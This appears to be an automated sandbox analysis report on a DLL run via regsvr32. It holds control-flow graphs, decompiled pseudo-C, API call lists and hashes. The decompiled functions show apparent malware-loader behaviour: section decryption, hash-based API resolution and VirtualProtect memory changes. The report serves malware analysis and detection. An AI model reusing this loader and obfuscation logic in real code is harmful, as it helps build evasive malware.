                                control_flow_graph 0 7ffc130eb3a0-7ffc130eb3a6 1 7ffc130eb3a8-7ffc130eb3ab 0->1 2 7ffc130eb3e1-7ffc130eb538 0->2 4 7ffc130eb3d5-7ffc130eb414 call 7ffc130eb89c 1->4 5 7ffc130eb3ad-7ffc130eb3b0 1->5 8 7ffc130eb53a-7ffc130eb53c 2->8 9 7ffc130eb53e-7ffc130eb559 call 7ffc130eb72c 2->9 22 7ffc130eb416-7ffc130eb418 4->22 23 7ffc130eb41d-7ffc130eb432 call 7ffc130eb72c 4->23 6 7ffc130eb3c8 __scrt_dllmain_crt_thread_attach 5->6 7 7ffc130eb3b2-7ffc130eb3b5 5->7 14 7ffc130eb3cd-7ffc130eb3d4 6->14 12 7ffc130eb3b7-7ffc130eb3c0 7->12 13 7ffc130eb3c1-7ffc130eb3c6 call 7ffc130eb7dc 7->13 15 7ffc130eb58e-7ffc130eb59d 8->15 20 7ffc130eb55b-7ffc130eb560 call 7ffc130ebc0c 9->20 21 7ffc130eb565-7ffc130eb58c call 7ffc130eb858 call 7ffc130eb888 call 7ffc130eba50 call 7ffc130eba74 9->21 13->14 20->21 21->15 27 7ffc130eb505-7ffc130eb51a 22->27 32 7ffc130eb434-7ffc130eb439 call 7ffc130ebc0c 23->32 33 7ffc130eb43e-7ffc130eb44f call 7ffc130eb79c 23->33 32->33 40 7ffc130eb4b8-7ffc130eb4c2 call 7ffc130eba50 33->40 41 7ffc130eb451-7ffc130eb48d call 7ffc130ebd54 call 7ffc130ebaf0 call 7ffc130ebbb4 call 7ffc130ebaf0 call 7ffc130ebbe0 call 7ffc130ed0c8 33->41 40->22 48 7ffc130eb4c8-7ffc130eb4d4 call 7ffc130ebbfc 40->48 41->40 68 7ffc130eb48f-7ffc130eb496 __scrt_dllmain_after_initialize_c 41->68 55 7ffc130eb4fa-7ffc130eb500 48->55 56 7ffc130eb4d6-7ffc130eb4e0 call 7ffc130eb9b4 48->56 55->27 56->55 62 7ffc130eb4e2-7ffc130eb4f5 call 7ffc130ebdec 56->62 62->55 68->40 69 7ffc130eb498-7ffc130eb4b5 call 7ffc130ed050 68->69 69->40
                                C-Code - Quality: 100%
                                			E00007FFC7FFC130EB3A0(void* __edx) {
                                				void* _t1;
                                				void* _t3;
                                				void* _t6;
                                
                                				_t3 = _t6;
                                				if (_t3 == 0) goto 0x130eb3e1;
                                				if (_t3 == 0) goto 0x130eb3d5;
                                				if (_t3 == 0) goto 0x130eb3c8;
                                				if (_t6 == 1) goto 0x130eb3c1;
                                				return _t1;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                • String ID:
                                • API String ID: 3885183344-0
                                • Opcode ID: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                                • Instruction ID: 16b6b08da8b7b05c29702a84e49a71bc7655186e0b7c35f39b35c38ddf256081
                                • Opcode Fuzzy Hash: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                                • Instruction Fuzzy Hash: 39519E21F0CE6F85FA24AB66A4422B926E0AF543ACF644031E54D377E7DE2CE465C734
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 35%
                                			E00007FFC7FFC130E2380(void* __rax, long long __rbx, void* __rcx, void* __rdx, signed int* __r8, void* __r9, long long __r12) {
                                				void* __rsi;
                                				void* _t104;
                                				signed int _t105;
                                				signed int _t107;
                                				signed int _t108;
                                				signed int _t110;
                                				void* _t113;
                                				void* _t114;
                                				void* _t115;
                                				signed int _t121;
                                				void* _t124;
                                				signed long long _t186;
                                				signed long long _t188;
                                				signed int _t194;
                                				long long _t205;
                                				void* _t209;
                                				void* _t210;
                                				void* _t220;
                                				void* _t224;
                                				void* _t226;
                                				void* _t228;
                                
                                				spl = spl + _t114;
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				_t220 = _t209;
                                				 *((long long*)(_t220 + 0x18)) = __rbx;
                                				 *((long long*)(_t220 + 0x20)) = _t205;
                                				_t210 = _t209 - 0x60;
                                				_t115 = __r9 - 0x2103;
                                				r13d = __r9 + 0x6ab;
                                				_t194 =  *(_t210 + 0xb8) + 0xfffffc37;
                                				 *(_t210 + 0xb8) =  *((intOrPtr*)(_t210 + 0xc8)) + 0x152;
                                				 *(_t210 + 0x98) = _t194;
                                				r14d = 0x1f0b6e910fc62a6;
                                				r15d = __rdx + 0x1249;
                                				r14d =  <  ? _t115 : r14d;
                                				if (r15d - _t104 > 0) goto 0x130e2709;
                                				_t105 = _t228 + 0x108;
                                				 *((long long*)(_t220 + 8)) = __r12;
                                				_t124 = r14d - _t105;
                                				if (_t124 > 0) goto 0x130e25c8;
                                				spl = spl ^  *0x3595;
                                				 *0x3595 =  *0x3595 + _t105;
                                				r12d = 0x3189;
                                				 *(_t210 + 0x20) = _t105;
                                				r8d = r12d;
                                				r9d = 0x1f2c;
                                				__r8[0x2e0923] = __r8[0x2e0923] + _t115;
                                				 *0x3595 =  *0x3595 + _t105;
                                				r11d = _t194 + 0x19d;
                                				 *((long long*)(_t210 + 0x50)) = __r8;
                                				r10d = _t226 - 0x1033;
                                				__r8[0x22] = 0x3595;
                                				 *(_t210 + 0x48) = 0x3595;
                                				 *(_t210 + 0x40) = r10d;
                                				r8d = 0x7669e800003534;
                                				 *(_t210 + 0x38) = r11d;
                                				r9d = _t226 - 0x16de;
                                				 *(_t210 + 0x30) = __rdx - 0x2598 + 0x36e7;
                                				 *((long long*)(_t210 + 0x28)) = __rdx + 0xfffffffffffffa9a;
                                				 *(_t210 + 0x20) = 0x7669e800002692;
                                				_t107 = E00007FFC7FFC130FF160(0x3595, __r8, __r8, _t228, _t226, _t224);
                                				r8d = 0;
                                				if (_t124 == 0) goto 0x130e2589;
                                				r9d = r8d;
                                				asm("o16 nop [eax+eax]");
                                				 *(__r9 + __r8[0x22]) = _t224 + 0x00000c8c ^  *(__r8[0x14] + __r9);
                                				_t108 = _t107 / __r8[0xe];
                                				__r8[0x90] = 0;
                                				__r8[0x7c] = __r8[0x7c] + 0x1f2c;
                                				if (__r8[0x78] !=  *((intOrPtr*)(__r8[0xc] + 0x1d0)) - 0x4cb) goto 0x130e2568;
                                				__r8[0x32] = __r8[0x32] + 0xffffdfce;
                                				r8d = r8d + 1;
                                				_t186 =  *((intOrPtr*)( *__r8 + 0x1d0)) + 0x8ace;
                                				if (r8d - _t186 < 0) goto 0x130e24f0;
                                				__r8[0x66] = __r8[0x66] | 0x0a01b449;
                                				if (_t108 - r12d >= 0) goto 0x130e25b8;
                                				r12d = r12d - _t108;
                                				__r8[0x66] = __r8[0x66] + (__r8[0x4c] ^ 0x0000127e) * 0x44f9;
                                				__r8[0x56] = __r8[0x14];
                                				goto 0x130e2701;
                                				_t110 = r12d + r14d;
                                				if (r14d - _t110 >= 0) goto 0x130e2624;
                                				_t188 = _t186 & 0x000027b2 | __r8[0x2a];
                                				if (__r8[0x2e] - _t188 > 0) goto 0x130e2624;
                                				if (_t228 - 0x102f - _t188 <= 0) goto 0x130e2610;
                                				__r8[0x32] = __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032);
                                				if (__r8[0x7e] - (_t121 | r13d) < 0) goto 0x130e26ed;
                                				r10d = _t121;
                                				r11d = __r8[0x78];
                                				r15d = r15d - (_t110 ^ r15d);
                                				r11d = r11d - __r8[0x74];
                                				r11d = r11d + __r8[0x24];
                                				r14d = r14d *  *__r8;
                                				r15d = r15d + 0xea7;
                                				r10d = r10d - __r8[0x12];
                                				r15d = r15d ^ 0x00002598;
                                				r8d = __r8[4];
                                				r9d = _t121;
                                				r8d = r8d &  *(_t210 + 0xb8);
                                				r12d = 0x3189;
                                				 *(_t210 + 0x58) = __r8[0x54] & 0x0000228c;
                                				r9d = r9d | r12d;
                                				 *((long long*)(_t210 + 0x50)) = 0x2602;
                                				 *(_t210 + 0x48) = r11d;
                                				 *(_t210 + 0x40) = __r8;
                                				 *(_t210 + 0x38) = r10d;
                                				 *(_t210 + 0x30) = r15d;
                                				 *((long long*)(_t210 + 0x28)) = __r8[6];
                                				 *(_t210 + 0x20) = r14d;
                                				_t113 = E00007FFC7FFC130E2060(__r8,  *(_t210 + 0xb8) * 0x30d5, (__r8[0x3c] ^ 0x000023f6) *  *(_t210 + 0x98), __r8[0x54] & 0x0000228c, 0x7669e800002692, __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032));
                                				__r8[0x62] = __r8[0x62] - __r8[0x4c] + _t121;
                                				return _t113;
                                 			}

                                APIs
                                • GetProcessHeap.KERNEL32 ref: 00007FFC13101456
                                • HeapAlloc.KERNEL32 ref: 00007FFC13101467
                                  • Part of subcall function 00007FFC130F7C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FFC130EA050), ref: 00007FFC130F7CFC
                                  • Part of subcall function 00007FFC130F7C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FFC130EA050), ref: 00007FFC130F7E18
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: HeapProtectVirtual$AllocProcess
                                • String ID: 2 $6$62 $662 $7$8662
                                • API String ID: 3541638468-3329516171
                                • Opcode ID: 67c9b6950c3a2d71ef505d544f281c5ab4f6862895f610e6b6873dadac7de400
                                • Instruction ID: 799a62481cb79f975a68f88121b026e27988392592366ed8ebdcb442330c63ba
                                • Opcode Fuzzy Hash: 67c9b6950c3a2d71ef505d544f281c5ab4f6862895f610e6b6873dadac7de400
                                • Instruction Fuzzy Hash: 5232F2735182C18BE371CF29E44479EBBA4F788748F148129EA899BB59DB7CE954CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 321 731bfc-731c41 322 731c43-731c45 call 7347b8 321->322 323 731c4a-731c5b call 73908c 321->323 322->323 327 731c63-731c6d 323->327 328 731c5d 323->328 329 731c6f-731c80 327->329 330 731cdd-731ce4 327->330 328->327 331 731c82-731c85 329->331 332 731c94 329->332 333 731ceb-731cfc call 73908c 330->333 335 731c90-731c92 331->335 336 731c87-731c8e 331->336 337 731c97-731c9a 332->337 341 731d09-731d0c 333->341 342 731cfe-731d03 333->342 335->332 335->337 336->331 336->335 339 731caf-731cc1 call 73240c 337->339 340 731c9c-731ca0 337->340 339->330 351 731cc3-731cdb 339->351 340->339 343 731ca2-731ca6 340->343 345 731d12-731d49 call 735168 341->345 346 731ed1 341->346 342->341 343->339 347 731ca8-731cac 343->347 353 731ec1-731ecf HeapFree 345->353 354 731d4f-731d6f call 73908c 345->354 349 731ed6-731eef 346->349 347->339 351->333 353->349 357 731d71 354->357 358 731d77-731d7e 354->358 357->358 359 731d80-731d8a call 73240c 358->359 360 731d8c 358->360 361 731d94-731da5 call 73908c 359->361 360->361 366 731da7 361->366 367 731dad-731db0 361->367 366->367 368 731ea1-731ebb HeapFree * 2 367->368 369 731db6-731dc9 call 73908c 367->369 368->353 372 731dd5 369->372 373 731dcb-731dd3 369->373 374 731dd8-731deb call 73908c 372->374 373->374 378 731df7 374->378 379 731ded-731df5 374->379 380 731dfa-731e0d call 73240c 378->380 379->380 384 731e93-731e9b HeapFree 380->384 385 731e13-731e70 call 7347b0 call 736518 380->385 384->368 389 731e75-731e7c 385->389 390 731e85-731e8d HeapFree 389->390 391 731e7e-731e83 389->391 390->384 391->390
                                C-Code - Quality: 28%
                                			E00731BFC(void* __ecx, long long* __rax, long long* __rbx, intOrPtr* __rcx, long long __rdx, void* __r8, void* __r9, void* __r11, long long* _a8, long long _a16, long long _a24, long long _a40, long long _a48) {
                                				long long _v72;
                                				char _v80;
                                				char _v88;
                                				long long _v96;
                                				char _v104;
                                				signed int _v112;
                                				long long _v120;
                                				long long _v128;
                                				signed int _v136;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t63;
                                				signed int _t67;
                                				signed int _t78;
                                				long long _t94;
                                				signed int _t111;
                                				signed int _t112;
                                				long long* _t148;
                                				long long* _t151;
                                				intOrPtr* _t154;
                                				long long* _t155;
                                				signed long long _t160;
                                				intOrPtr _t185;
                                				intOrPtr* _t188;
                                				long long _t189;
                                				long long* _t190;
                                				long long* _t191;
                                				long long _t192;
                                				long long* _t194;
                                				void* _t198;
                                				void* _t205;
                                				void* _t207;
                                				long long* _t208;
                                				intOrPtr _t209;
                                				long long _t210;
                                
                                				_t207 = __r11;
                                				_t205 = __r9;
                                				_t198 = __r8;
                                				_t155 = __rbx;
                                				_t148 = __rax;
                                				_a24 = __rbx;
                                				_a16 = __rdx;
                                				_t210 =  *0x73d458;
                                				_t189 =  *((intOrPtr*)(__rcx));
                                				r13d = r8d;
                                				_t192 = __rdx;
                                				_t190 = __rcx;
                                				_v72 = _t210;
                                				_v96 = _t189;
                                				_t208 = __rbx;
                                				if( *((intOrPtr*)(__rcx + 0x70)) >=  *((intOrPtr*)(__rcx + 0x50))) {
                                					E007347B8(0, __ecx, __rax, __rbx, __rcx, __rdx);
                                				}
                                				_t160 =  *((intOrPtr*)(_t210 + 0x10));
                                				E0073908C(0x4a75e5e7, _t148, _t160);
                                				if(_t148 != _t155) {
                                					_t9 = _t189 + 0x18; // 0x18
                                					_t160 = _t9;
                                					 *_t148();
                                				}
                                				_t93 =  *(_t190 + 0x70) & 0x000000ff;
                                				_t63 =  *(_t190 + 0x50) & 0x000000ff;
                                				if(( *(_t190 + 0x70) & 0x000000ff) < _t63) {
                                					_t112 = 0;
                                					_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t190 + 0x48)) + _t160 * 8));
                                					_t154 = _t188;
                                					_t94 =  *_t188;
                                					if(_t94 == 0) {
                                						L9:
                                						_t148 = _t155;
                                					} else {
                                						while(_t94 != 0x2f) {
                                							_t148 = _t154 + 1;
                                							_t94 =  *_t148;
                                							if(_t94 != 0) {
                                								continue;
                                							}
                                							break;
                                						}
                                						if(_t94 == 0) {
                                							goto L9;
                                						}
                                					}
                                					if(_t148 != _t155 &&  *((char*)(_t148 - 1)) == 0x3a &&  *((char*)(_t148 + 1)) == 0x2f) {
                                						_t112 = _t63 - 0x4a75e5e7 + 2;
                                					}
                                					_t93 = _t112;
                                					E0073240C(0, 0, _t155, _t160 + _t188, _t189, _t190);
                                					_t208 = _t148;
                                					if(_t148 == _t155) {
                                						goto L16;
                                					} else {
                                						bpl = _t112 == 8;
                                						_a8 = 0;
                                						_t192 = _a16;
                                					}
                                				}
                                				E0073908C(0x8d72aad2, _t148,  *((intOrPtr*)(_t210 + 0x10)));
                                				if(_t148 != _t155) {
                                					 *_t148();
                                				}
                                				if(_t208 == _t155) {
                                					_t111 = 8;
                                				} else {
                                					_t23 =  &_v104; // 0x2
                                					r9d = 0;
                                					r8d = r13d;
                                					_v112 = _t23;
                                					_t25 =  &_v88; // 0x12
                                					_t185 = _t192;
                                					_v120 = _t25;
                                					_t27 =  &_v80; // 0x1a
                                					_t151 = _t27;
                                					_v128 = _t151;
                                					_v136 = 0;
                                					_t67 = E00735168(_t93, 0, _t155, _t190, _t185, _t198, _t205, _t207); // executed
                                					_t111 = _t67;
                                					if(_t67 == 0) {
                                						_t209 =  *0x73d458;
                                						_t111 = 8;
                                						E0073908C(0x4a75e5e7, _t151,  *((intOrPtr*)(_t209 + 0x10)));
                                						if(_t151 != _t155) {
                                							 *_t151();
                                						}
                                						_t165 =  *((intOrPtr*)(_t190 + 0x18));
                                						if( *((intOrPtr*)(_t190 + 0x18)) == _t155) {
                                							_t191 = _a8;
                                						} else {
                                							E0073240C(0, 0, _t155, _t165, _t189, _t190);
                                							_t191 = _t151;
                                						}
                                						E0073908C(0x8d72aad2, _t151,  *((intOrPtr*)(_t209 + 0x10)));
                                						if(_t151 != _t155) {
                                							 *_t151();
                                						}
                                						if(_t191 != _t155) {
                                							E0073908C(0xfb849f8f, _t151,  *((intOrPtr*)(_t210 + 0x18)));
                                							if(_t151 == _t155) {
                                								r14d = 0;
                                							} else {
                                								r14d =  *_t151();
                                							}
                                							E0073908C(0xfb849f8f, _t151,  *((intOrPtr*)(_v72 + 0x18)));
                                							if(_t151 == _t155) {
                                								r13d = 0;
                                							} else {
                                								r13d =  *_t151();
                                							}
                                							_t40 = _t210 + 2; // 0x2
                                							E0073240C(0, _t209 + _t40, _t155, _t208, _t189, _t191);
                                							_t194 = _t151;
                                							if(_t151 != _t155) {
                                								_t41 = _t209 + 1; // 0x1
                                								r8d = _t41;
                                								 *((char*)(_t185 + _t151)) = 0x2f;
                                								L007347B0();
                                								_v112 = _a8 != 0x00000000 | 0x00000002;
                                								_v120 = _a48;
                                								_v128 = _a40;
                                								_v136 = _v104;
                                								_t78 = E00736518(_a8 != 0x00000000 | 0x00000002, _t111, 0xfb849f8f, _a40, _v96, _t194, _t189, _t191, _t194, _v80, _v88); // executed
                                								_t111 = _t78;
                                								if(_t78 == 0x10d2) {
                                									asm("sbb eax, eax");
                                									_t111 = _t111 & _t78;
                                								}
                                								HeapFree();
                                							}
                                							HeapFree();
                                						}
                                						HeapFree();
                                						HeapFree(??, ??, ??);
                                					}
                                					HeapFree();
                                				}
                                				return _t111;
                                 			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID: uJ$uJ
                                • API String ID: 2332451156-3171342107
                                • Opcode ID: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction ID: 88140dc4fb78379bb66918ca7f2eef434e4d407e9adf5c65b18b8dbe136aaab6
                                • Opcode Fuzzy Hash: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction Fuzzy Hash: 0C71A026708BC486EB20DF66E45436EA7A2FBC9B84F988835DE8E47716DE3CC4458710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 392 734db4-734def HeapCreate 393 734f03-734f23 392->393 394 734df5-734e0b 392->394 395 734e11-734e16 394->395 396 734e94 394->396 397 734e22-734e24 395->397 398 734e18-734e20 395->398 399 734e99-734e9b 396->399 397->396 400 734e26-734e49 HeapAlloc 397->400 398->395 398->397 401 734ea8-734ecf HeapAlloc 399->401 402 734e9d-734ea6 HeapDestroy 399->402 405 734e4b-734e8b call 73111c call 7316fc 400->405 406 734e8d-734e92 400->406 403 734ee1-734efc call 73487a call 7337e0 401->403 404 734ed1-734edf HeapDestroy 401->404 402->393 413 734f01 403->413 404->393 405->399 406->399 413->393
                                C-Code - Quality: 53%
                                			E00734DB4(long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r9, void* __r10, void* __r11) {
                                				intOrPtr _t23;
                                				void* _t25;
                                				void* _t31;
                                				intOrPtr _t40;
                                				long long _t48;
                                				long long _t51;
                                				void* _t63;
                                				intOrPtr* _t67;
                                				void* _t68;
                                				long long _t70;
                                				long long _t72;
                                				void* _t73;
                                				long long _t75;
                                				void* _t81;
                                				void* _t82;
                                				void* _t83;
                                				long _t84;
                                				long _t86;
                                				long _t88;
                                				long long _t90;
                                
                                				_t83 = __r11;
                                				_t82 = __r10;
                                				_t81 = __r9;
                                				_t49 = __rbx;
                                				_t48 = _t75;
                                				 *((long long*)(_t48 + 8)) = __rbx;
                                				 *((long long*)(_t48 + 0x10)) = _t72;
                                				 *((long long*)(_t48 + 0x18)) = __rsi;
                                				 *((long long*)(_t48 + 0x20)) = __rdi;
                                				_t73 = __rcx;
                                				r8d = 0;
                                				_t31 = 8; // executed
                                				HeapCreate(_t88, _t86, _t84); // executed
                                				_t70 = _t48;
                                				if(_t48 == 0) {
                                					L14:
                                					return _t31;
                                				}
                                				_t63 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                                				_t67 = _t48 + _t63 + 0x68;
                                				_t23 =  *_t67;
                                				if(_t23 == 0) {
                                					L8:
                                					_t31 = 2;
                                					L9:
                                					if(_t31 == 0) {
                                						_t40 =  *0x73d450;
                                						_t68 = _t67 + 0x128ab5c4;
                                						HeapAlloc(??, ??, ??);
                                						_t51 = _t48;
                                						if(_t48 != 0) {
                                							E0073487A();
                                							 *((long long*)(_t51 + 8)) = _t70;
                                							 *0x73d458 = _t51; // executed
                                							_t25 = E007337E0(0, 0, _t40, _t48, _t73, _t68, _t81, _t82); // executed
                                							_t31 = _t25;
                                						} else {
                                							HeapDestroy();
                                							_t31 = 8;
                                						}
                                					} else {
                                						HeapDestroy();
                                					}
                                					goto L14;
                                				}
                                				while(_t23 != 0x7373622e) {
                                					_t67 = _t67 + 0x28;
                                					_t23 =  *_t67;
                                					if(_t23 != 0) {
                                						continue;
                                					}
                                					break;
                                				}
                                				if(_t23 == 0) {
                                					goto L8;
                                				} else {
                                					r13d =  *(_t67 + 0x10);
                                					r12d =  *(_t67 + 0x14);
                                					r12d = r12d ^  *(_t63 + 8);
                                					r12d = r12d ^ r13d;
                                					HeapAlloc(??, ??, ??);
                                					_t90 = _t48;
                                					if(_t48 == 0) {
                                						_t31 = 8;
                                					} else {
                                						r9d = r12d;
                                						r8d = r13d;
                                						E0073111C(_t49, _t48, _t63 + _t73);
                                						r11d =  *((intOrPtr*)(_t67 + 0xc));
                                						_t48 = 0x741040;
                                						 *0x73d448 = _t90 - _t83 - _t73;
                                						 *0x73d450 = E007316FC(_t90 - _t83 - _t73 + 0x741040);
                                					}
                                					goto L9;
                                				}
                                			}


                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$AllocDestroy$Create
                                • String ID: .bss
                                • API String ID: 388876957-3890483948
                                • Opcode ID: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction ID: 199c13762ca88663afdc7a06dea7328f5ce92628d8e03969e136d497687aa5d8
                                • Opcode Fuzzy Hash: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction Fuzzy Hash: 8E318C66B0478186FB18CF66A98431A77A1F788FD4F188025DE4947B56EF3CF995C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 35%
                                			E00007FFC7FFC130F7C20(long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, signed long long __r9) {
                                				void* __rdi;
                                				signed int _t122;
                                				void* _t126;
                                				signed int _t130;
                                				void* _t131;
                                				signed int _t132;
                                				void* _t137;
                                				void* _t146;
                                				intOrPtr _t149;
                                				signed long long _t168;
                                				void* _t191;
                                				intOrPtr _t212;
                                				intOrPtr _t222;
                                				void* _t223;
                                				signed long long _t226;
                                				void* _t231;
                                				signed long long _t232;
                                				long long _t235;
                                				signed int _t238;
                                				void* _t240;
                                				void* _t241;
                                				signed long long _t245;
                                				intOrPtr* _t251;
                                				signed long long _t253;
                                				signed int _t254;
                                				void* _t255;
                                				long _t257;
                                				void* _t259;
                                				long _t261;
                                				void* _t263;
                                
                                				_t255 = _t240;
                                				 *((long long*)(_t255 + 8)) = __rbx;
                                				 *((long long*)(_t255 + 0x10)) = _t235;
                                				 *((long long*)(_t255 + 0x18)) = __rsi;
                                				_t241 = _t240 - 0x60;
                                				_t212 =  *((intOrPtr*)(_t241 + 0xb0));
                                				r14d = __rcx - 0x2103;
                                				r12d = __r8 + 0xd1;
                                				r15d =  *(_t241 + 0xd8);
                                				_t231 =  *(_t241 + 0xd0) + 0xfffff9ee;
                                				r15d = r15d + 0x1249;
                                				r13d = _t212 - 0x27b2;
                                				r8d = r8d + 0x152;
                                				if (_t212 + 0xeb4 - _t146 < 0) goto 0x130f7f40;
                                				if (r14d == _t131) goto 0x130f7f24;
                                				if ( *((long long*)(__r9 + 0x2f8)) == 0) goto 0x130f7e1e;
                                				 *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) +  *(__r9 + 0x90) - 0x3a59;
                                				_t149 =  *((intOrPtr*)(__r9));
                                				 *((long long*)(__r9 + 0x48)) = 0x84ef49a;
                                				r8d =  *(_t149 + 0x130);
                                				r8d = r8d ^ 0x000023f3; // executed
                                				VirtualProtect(_t263, _t261);
                                				if (_t149 != 0) goto 0x130f7d2b;
                                				_t191 =  *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x188)) + 0x259;
                                				_t137 = _t191 - 0x3595;
                                				if (_t137 < 0) goto 0x130f7d2b;
                                				 *(__r9 + 0x90) =  *(__r9 + 0x90) ^ __r9 + 0x000001c0;
                                				_t238 =  *((intOrPtr*)(__r9 + 0x2f8)) +  *0x7FFBD54B40A3;
                                				if (_t137 <= 0) goto 0x130f7d6a;
                                				_t245 =  *(__r9 + 0x228) ^ 0x00001f2c;
                                				 *(__r9 + 0x120) = _t245;
                                				if (_t126 - _t191 < 0) goto 0x130f7d51;
                                				_t251 = _t241 + 0xd0;
                                				 *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) +  *((intOrPtr*)(__r9 + 0x70)) + 0x2032;
                                				 *((long long*)(_t238 + 8)) =  *((intOrPtr*)(__r9 + 0xc0));
                                				 *((long long*)(_t238 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x118)) + 0x50));
                                				 *((long long*)(__r9 + 0x28)) = __r9 + 0x1b0;
                                				r8d =  *( *((intOrPtr*)(__r9 + 0x118)) + 0x88 +  *( *((intOrPtr*)(__r9)) + 0x130) * 0x3ffaa955 * 8);
                                				 *_t238 = _t245 +  *((intOrPtr*)(__r9 + 0xc0));
                                				 *((long long*)(__r9 + 0xa0)) = 0x6dce;
                                				 *((long long*)(_t238 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x118)) + 0xa4));
                                				 *( *((intOrPtr*)(__r9 + 0x140)) + 0x198) =  *( *((intOrPtr*)(__r9 + 0x140)) + 0x198) |  *(__r9 + 0x198) + 0x0000329d;
                                				r8d =  *(_t241 + 0xd0);
                                				VirtualProtect(_t259, _t257);
                                				if (_t231 -  *((intOrPtr*)(_t241 + 0xc0)) + 0x10a3 < 0) goto 0x130f803b;
                                				r14d = r14d + 0x30d5;
                                				 *((long long*)(__r9 + 0x158)) =  *((intOrPtr*)(__r9 + 0x88));
                                				 *((long long*)(__r9 + 0x298)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0xd0)) + 0x28)) +  *((intOrPtr*)(__r9 + 0xc0));
                                				 *((long long*)(__r9 + 0x10)) = 0x2598;
                                				 *(__r9 + 0x198) =  *(__r9 + 0x198) * 0xed7e2e8;
                                				_t226 =  *((intOrPtr*)(__r9 + 0x158));
                                				if (_t226 == 0) goto 0x130f7eac;
                                				_t168 =  *(__r9 + 0x1e0) | 0x0000228c;
                                				 *(__r9 + 0x198) = _t168;
                                				GetProcessHeap();
                                				if (_t168 == 0) goto 0x130f7eac;
                                				HeapFree(??, ??, ??); // executed
                                				r8d =  *(_t241 + 0xd8);
                                				 *(_t241 + 0x50) = _t168;
                                				r10d = _t259 + 0x2032;
                                				 *(_t241 + 0x48) = r10d;
                                				r11d = _t257 - 0x1563;
                                				 *((intOrPtr*)(_t241 + 0x40)) = r11d;
                                				 *(_t241 + 0x38) = _t226;
